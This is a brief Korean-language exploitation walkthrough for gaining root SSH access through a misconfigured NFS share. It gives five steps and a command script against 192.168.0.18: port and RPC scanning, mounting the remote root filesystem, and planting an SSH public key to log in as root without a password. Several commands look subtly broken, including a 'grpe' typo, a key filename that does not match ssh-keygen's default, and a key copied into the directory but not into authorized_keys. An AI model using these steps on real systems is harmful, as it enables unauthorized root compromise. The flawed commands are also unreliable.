NFS 서비스가 활성화된 경우 공격자가 원격 마운트를 사용하여 대상 시스템에 ssh 키 인증 파일 생성
이 가능하므로 ssh를 통해 비밀번호 없이 쉘 접근이 가능하다.
Step 1. 포트 스캔하여 rpcbind(111) 및 nfs(2049) 포트가 활성화된 서버 확인 Step 2. rpc 서비스 정보에서 활성화된 NFS 포트를 확인하고 NFS 서버에 공유된 디렉터리가 존재함을 확인 Step 3. /root/.ssh 디렉터리 생성 후 비밀번호 없이 쉘에 접근하기 위한 ssh rsa 키 생성 Step 4. 대상 서버에 NFS 마운트 진행 후 ssh 디렉터리로 ssh 공개키 복사 Step 5. ssh 연결 시 비밀번호 없이 접근 가능하여 원격 쉘 획득 가능 스크립트
# 서비스 포트 확인
nmap -p- -sV -O 192.168.0.18
rpcinfo -p 192.168.0.18 | grpe nfs
# NFS 공유 디렉터리 확인
showmount -e 192.168.0.18
# ssh 키 생성
mkdir /root/.ssh
ssh-keygen -t rsa -b 4096
mount -o nolock -t nfs 192.168.0.18:/ /mnt
cd /mnt/root/.ssh
cp /root/.ssh/kali_rsa.pub /mnt/root/.ssh
cd /root/.ssh
# ssh 접근
ssh -i /root/.ssh/kali_rsa root@192.168.0.18
